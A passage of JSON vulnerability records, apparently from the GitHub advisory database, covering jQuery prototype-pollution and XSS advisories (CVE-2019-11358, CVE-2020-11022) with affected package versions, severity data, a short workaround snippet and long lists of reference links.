"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-6c3j-c64m-qhgq/GHSA-6c3j-c64m-qhgq.json" } }, { "package": { "name": "django", "ecosystem": "PyPI", "purl": "pkg:pypi/django" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.2a1" }, { "fixed": "2.2.2" } ] } ], "versions": [ "2.2", "2.2.1", "2.2a1", "2.2b1", "2.2rc1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-6c3j-c64m-qhgq/GHSA-6c3j-c64m-qhgq.json" } }, { "package": { "name": "org.webjars.npm:jquery", "ecosystem": "Maven", "purl": "pkg:maven/org.webjars.npm/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.1.4" }, { "fixed": "3.4.0" } ] } ], "versions": [ "1.11.0", "1.11.1", "1.11.3", "1.12.1", "1.12.2", "1.12.3", "1.12.4", "1.7.2", "1.7.3", "1.8.2", "1.8.3", "1.9.1", "2.1.0", "2.1.1", "2.1.1-rc1", "2.1.1-rc2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "3.0.0", "3.0.0-alpha1", "3.0.0-beta1", "3.0.0-rc1", 
"3.1.0", "3.1.1", "3.2.0", "3.2.1", "3.3.0", "3.3.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-6c3j-c64m-qhgq/GHSA-6c3j-c64m-qhgq.json" } }, { "package": { "name": "maximebf/debugbar", "ecosystem": "Packagist", "purl": "pkg:composer/maximebf/debugbar" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.19.0" } ] } ], "versions": [ "1.0", "1.0.1", "1.0.2", "1.0.3", "1.0.4", "1.1", "1.10.0", "1.10.1", "1.13.1", "1.2", "1.3", "1.4", "1.5", "1.5.1", "1.6", "1.6.1", "1.7", "1.7.1", "1.8", "1.9", "1.9.1", "1.9.10", "1.9.11", "1.9.12", "1.9.13", "1.9.14", "1.9.15", "1.9.2", "1.9.3", "1.9.4", "1.9.5", "1.9.6", "1.9.7", "1.9.8", "1.9.9", "v1.10.2", "v1.10.3", "v1.10.4", "v1.10.5", "v1.11.0", "v1.11.1", "v1.12.0", "v1.13.0", "v1.14.0", "v1.14.1", "v1.15.0", "v1.15.1", "v1.16.0", "v1.16.1", "v1.16.2", "v1.16.3", "v1.16.4", "v1.16.5", "v1.17.0", "v1.17.1", "v1.17.2", "v1.17.3", "v1.18.0", "v1.18.1", "v1.18.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-6c3j-c64m-qhgq/GHSA-6c3j-c64m-qhgq.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-11358" }, { "type": "WEB", "url": "https://github.com/maximebf/php-debugbar/issues/447" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/pull/4333" }, { "type": "WEB", "url": "https://github.com/maximebf/php-debugbar/commit/847216e60544258c881f2733d699bbcfeefac0fc" }, { "type": "WEB", "url": "https://github.com/django/django/commit/34ec52269ade54af31a021b12969913129571a3f" }, { "type": "WEB", "url": "https://github.com/django/django/commit/95649bc08547a878cebfa1d019edec8cb1b80829" }, { "type": "WEB", "url": "https://github.com/django/django/commit/baaf187a4e354bf3976c51e2c83a0d2f8ee6e6ad" }, { "type": "WEB", "url": 
"https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5IABSKTYZ5JUGL735UKGXL5YPRYOPUYI" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KYH3OAGR2RTCHRA5NOKX2TES7SNQMWGO" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLXRX23725JL366CNZGJZ7AQQB7LHQ6F" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Apr/32" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Jun/12" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/18" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2020-02" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RLXRX23725JL366CNZGJZ7AQQB7LHQ6F" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KYH3OAGR2RTCHRA5NOKX2TES7SNQMWGO" }, { "type": "WEB", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5IABSKTYZ5JUGL735UKGXL5YPRYOPUYI" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00024.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00029.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00006.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rac25da84ecdcd36f6de5ad0d255f4e967209bbbebddb285e231da37d@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2019-08" }, { "type": "WEB", "url": "https://www.synology.com/security/advisory/Synology_SA_19_19" }, { "type": "WEB", "url": "https://www.privacy-wise.com/mitigating-cve-2019-11358-in-old-versions-of-jquery" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": 
"https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.drupal.org/sa-core-2019-006" }, { "type": "WEB", "url": "https://www.djangoproject.com/weblog/2019/jun/03/security-releases" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4460" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4434" }, { "type": "WEB", "url": "https://web.archive.org/web/20190824065237/http://www.securityfocus.com/bid/108023" }, { "type": "WEB", "url": "https://supportportal.juniper.net/s/article/2021-07-Security-Bulletin-Junos-OS-Multiple-J-Web-vulnerabilities-resolved-in-Junos-OS-21-2R1" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-JQUERY-174006" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-DOTNET-JQUERY-450226" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190919-0001" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88fb0362fd40e5b605ea8149f63241537b8b6fb5bfa315391fc5cbb7@%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88fb0362fd40e5b605ea8149f63241537b8b6fb5bfa315391fc5cbb7%40%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/6097cdbd6f0a337bedd9bb5cc441b2d525ff002a96531de367e4259f@%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6097cdbd6f0a337bedd9bb5cc441b2d525ff002a96531de367e4259f%40%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5928aa293e39d248266472210c50f176cac1535220f2486e6a7fa844@%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5928aa293e39d248266472210c50f176cac1535220f2486e6a7fa844%40%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/08720ef215ee7ab3386c05a1a90a7d1c852bf0706f176a7816bf65fc@%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/08720ef215ee7ab3386c05a1a90a7d1c852bf0706f176a7816bf65fc%40%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2019-11358.yml" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#434" }, { "type": "PACKAGE", "url": "https://github.com/jquery/jquery" }, { "type": "WEB", "url": "https://blog.jquery.com/2019/04/10/jquery-3-4-0-released" }, { "type": "WEB", "url": "https://backdropcms.org/security/backdrop-sa-core-2019-009" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3024" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3023" }, { "type": "WEB", "url": 
"https://access.redhat.com/errata/RHSA-2019:2587" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1456" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2019:1570" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rac25da84ecdcd36f6de5ad0d255f4e967209bbbebddb285e231da37d%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7e8ebccb7c022e41295f6fdb7b971209b83702339f872ddd8cf8bf73@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7e8ebccb7c022e41295f6fdb7b971209b83702339f872ddd8cf8bf73%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7d64895cc4dff84d0becfc572b20c0e4bf9bfa7b10c6f5f73e783734@%3Cdev.storm.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7d64895cc4dff84d0becfc572b20c0e4bf9bfa7b10c6f5f73e783734%40%3Cdev.storm.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7aac081cbddb6baa24b75e74abf0929bf309b176755a53e3ed810355@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7aac081cbddb6baa24b75e74abf0929bf309b176755a53e3ed810355%40%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r41b5bfe009c845f67d4f68948cc9419ac2d62e287804aafd72892b08@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r41b5bfe009c845f67d4f68948cc9419ac2d62e287804aafd72892b08%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r38f0d1aa3c923c22977fe7376508f030f22e22c1379fbb155bf29766@%3Cdev.syncope.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r38f0d1aa3c923c22977fe7376508f030f22e22c1379fbb155bf29766%40%3Cdev.syncope.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r2baacab6e0acb5a2092eb46ae04fd6c3e8277b4fd79b1ffb7f3254fa@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2baacab6e0acb5a2092eb46ae04fd6c3e8277b4fd79b1ffb7f3254fa%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2041a75d3fc09dec55adfd95d598b38d22715303f65c997c054844c9@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2041a75d3fc09dec55adfd95d598b38d22715303f65c997c054844c9%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6@%3Ccommits.roller.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b736d0784cf02f5a30fbb4c5902762a15ad6d47e17e2c5a17b7d6205@%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b736d0784cf02f5a30fbb4c5902762a15ad6d47e17e2c5a17b7d6205%40%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00006.html" }, { "type": "WEB", "url": 
"http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00025.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2019/May/10" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2019/May/11" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2019/May/13" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2019/06/03/2" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/108023" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2019-04-26T16:28:41Z", "nvd_published_at": "2019-04-20T00:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gxr4-xjj5-5px2", "published": "2020-04-29T22:18:55Z", "modified": "2025-01-31T20:51:56.658421Z", "aliases": [ "BIT-drupal-2020-11022", "CVE-2020-11022" ], "related": [ "CVE-2020-11022" ], "summary": "Potential XSS vulnerability in jQuery", "details": "### Impact\nPassing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. 
`.html()`, `.append()`, and others) may execute untrusted code.\n\n### Patches\nThis problem is patched in jQuery 3.5.0.\n\n### Workarounds\nTo workaround the issue without upgrading, adding the following to your code:\n\n```js\njQuery.htmlPrefilter = function( html ) {\n\treturn html;\n};\n```\n\nYou need to use at least jQuery 1.12/2.2 or newer to be able to apply this workaround.\n\n### References\nhttps://blog.jquery.com/2020/04/10/jquery-3-5-0-released/\nhttps://jquery.com/upgrade-guide/3.5/\n\n### For more information\nIf you have any questions or comments about this advisory, search for a relevant issue in [the jQuery repo](https://github.com/jquery/jquery/issues). If you don't find an answer, open a new issue.", "affected": [ { "package": { "name": "jquery", "ecosystem": "npm", "purl": "pkg:npm/jquery" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.2.0" }, { "fixed": "3.5.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gxr4-xjj5-5px2/GHSA-gxr4-xjj5-5px2.json" } }, { "package": { "name": "jquery", "ecosystem": "NuGet", "purl": "pkg:nuget/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.2.0" }, { "fixed": "3.5.0" } ] } ], "versions": [ "1.10.0", "1.10.0.1", "1.10.1", "1.10.2", "1.11.0", "1.11.1", "1.11.2", "1.11.3", "1.12.0", "1.12.1", "1.12.2", "1.12.3", "1.12.4", "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.5.0", "1.5.1", "1.5.2", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.6.4", "1.7.0", "1.7.1", "1.7.1.1", "1.7.2", "1.8.0", "1.8.1", "1.8.2", "1.8.3", "1.9.0", "1.9.1", "2.0.0", "2.0.1", "2.0.1.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "3.0.0", "3.0.0.1", "3.1.0", "3.1.1", "3.2.1", "3.3.1", "3.4.0", "3.4.1" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gxr4-xjj5-5px2/GHSA-gxr4-xjj5-5px2.json" } }, { "package": { "name": "jquery-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/jquery-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.4.0" } ] } ], "versions": [ "0.1.1", "0.1.2", "0.1.3", "0.2", "0.2.1", "0.2.2", "0.2.3", "0.2.4", "0.2.5", "0.2.6", "0.2.7", "1.0", "1.0.1", "1.0.10", "1.0.11", "1.0.12", "1.0.13", "1.0.14", "1.0.15", "1.0.16", "1.0.17", "1.0.18", "1.0.19", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "1.0.9", "1.0.rc", "2.0.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.3.0", "3.0.0", "3.0.1", "3.0.2", "3.0.3", "3.0.4", "3.1.0", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5", "4.0.0", "4.0.0.beta1", "4.0.0.beta2", "4.0.1", "4.0.2", "4.0.3", "4.0.4", "4.0.5", "4.1.0", "4.1.1", "4.2.0", "4.2.1", "4.2.2", "4.3.0", "4.3.1", "4.3.2", "4.3.3", "4.3.4", "4.3.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gxr4-xjj5-5px2/GHSA-gxr4-xjj5-5px2.json" } }, { "package": { "name": "org.webjars.npm:jquery", "ecosystem": "Maven", "purl": "pkg:maven/org.webjars.npm/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.2.0" }, { "fixed": "3.5.0" } ] } ], "versions": [ "1.11.0", "1.11.1", "1.11.3", "1.12.1", "1.12.2", "1.12.3", "1.12.4", "1.7.2", "1.7.3", "1.8.2", "1.8.3", "1.9.1", "2.1.0", "2.1.1", "2.1.1-rc1", "2.1.1-rc2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "3.0.0", "3.0.0-alpha1", "3.0.0-beta1", "3.0.0-rc1", "3.1.0", "3.1.1", "3.2.0", "3.2.1", "3.3.0", "3.3.1", "3.4.0", "3.4.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gxr4-xjj5-5px2/GHSA-gxr4-xjj5-5px2.json" } }, { "package": { "name": 
"maximebf/debugbar", "ecosystem": "Packagist", "purl": "pkg:composer/maximebf/debugbar" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.19.0" } ] } ], "versions": [ "1.0", "1.0.1", "1.0.2", "1.0.3", "1.0.4", "1.1", "1.10.0", "1.10.1", "1.13.1", "1.2", "1.3", "1.4", "1.5", "1.5.1", "1.6", "1.6.1", "1.7", "1.7.1", "1.8", "1.9", "1.9.1", "1.9.10", "1.9.11", "1.9.12", "1.9.13", "1.9.14", "1.9.15", "1.9.2", "1.9.3", "1.9.4", "1.9.5", "1.9.6", "1.9.7", "1.9.8", "1.9.9", "v1.10.2", "v1.10.3", "v1.10.4", "v1.10.5", "v1.11.0", "v1.11.1", "v1.12.0", "v1.13.0", "v1.14.0", "v1.14.1", "v1.15.0", "v1.15.1", "v1.16.0", "v1.16.1", "v1.16.2", "v1.16.3", "v1.16.4", "v1.16.5", "v1.17.0", "v1.17.1", "v1.17.2", "v1.17.3", "v1.18.0", "v1.18.1", "v1.18.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gxr4-xjj5-5px2/GHSA-gxr4-xjj5-5px2.json" } }, { "package": { "name": "athlon1600/youtube-downloader", "ecosystem": "Packagist", "purl": "pkg:composer/athlon1600/youtube-downloader" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "4.0.0" } ] } ], "versions": [ "v1.0.0", "v1.0.1", "v2.0.0", "v2.0.1", "v2.0.2", "v2.0.3", "v2.0.4", "v2.0.5", "v2.0.6", "v2.0.7", "v2.0.8", "v2.0.9", "v2.1.0", "v2.1.1", "v2.1.2", "v3.0.0", "v3.0.1", "v3.0.2", "v3.1.0", "v3.1.1", "v3.1.2", "v4.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gxr4-xjj5-5px2/GHSA-gxr4-xjj5-5px2.json" } }, { "package": { "name": "components/jquery", "ecosystem": "Packagist", "purl": "pkg:composer/components/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.2.0" }, { "fixed": "3.5.0" } ] } ], "versions": [ "1.10.0", "1.10.1", "1.10.2", "1.11.0", "1.11.1", "1.11.2", "1.11.3", "1.12.0", "1.12.1", "1.12.4", "1.8.3", "1.9.0", "1.9.1", "2.0.0", "2.0.1", "2.0.2", 
"2.0.3", "2.1.0", "2.1.1", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.4", "3.0.0", "3.1.0", "3.1.1", "3.2.0", "3.2.1", "3.3.1", "3.4.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gxr4-xjj5-5px2/GHSA-gxr4-xjj5-5px2.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/jquery/jquery/security/advisories/GHSA-gxr4-xjj5-5px2" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11022" }, { "type": "WEB", "url": "https://github.com/maximebf/php-debugbar/issues/447" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77" }, { "type": "WEB", "url": "https://github.com/maximebf/php-debugbar/commit/847216e60544258c881f2733d699bbcfeefac0fc" }, { "type": "WEB", "url": "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SFP4UK4EGP4AFH2MWYJ5A5Z4I7XVFQ6B" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOE7P7APPRQKD4FGNHBKJPDY6FFCOH3W" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202007-03" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200511-0006" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4693" }, { "type": "WEB", "url": "https://www.drupal.org/sa-core-2020-002" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1518" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": 
"https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2020-10" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2020-11" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2021-02" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2021-10" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-gxr4-xjj5-5px2" }, { "type": "PACKAGE", "url": "https://github.com/jquery/jquery" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/releases/tag/3.5.0" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2020-11022.yml" }, { "type": "WEB", "url": "https://jquery.com/upgrade-guide/3.5" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133@%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": 